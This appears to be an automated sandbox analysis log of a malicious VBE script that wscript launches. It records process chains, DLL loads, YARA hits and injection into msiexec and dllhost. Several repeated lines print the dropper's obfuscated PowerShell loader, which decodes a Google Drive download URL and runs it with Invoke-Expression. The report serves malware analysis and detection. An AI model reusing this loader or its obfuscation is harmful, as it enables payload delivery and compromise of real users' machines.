              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F527011_2_030F5270
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F34AB11_2_030F34AB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030F34B011_2_030F34B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030ECB2F11_2_030ECB2F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030ECB3011_2_030ECB30
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0310B85011_2_0310B850
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030ECD5011_2_030ECD50
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_030EADD011_2_030EADD0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 03845130 appears 36 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 0387EA12 appears 86 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 0388F290 appears 103 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 03857E54 appears 95 times
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 037FB970 appears 254 times
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7457
              Source: unknownProcess created: Commandline size = 7457
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7457Jump to behavior
              Source: amsi32_4312.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6044, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBE@10/7@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Gesjftigere.SigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnwyp1oa.1ro.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6044
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4312
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: EL-25-536_40005512_Le Cuivre_23102024.vbeReversingLabs: Detection: 21%
              Source: msiexec.exeString found in binary or memory: g, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-
              Source: msiexec.exeString found in binary or memory: d, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog
              Source: msiexec.exeString found in binary or memory: oog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeti
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
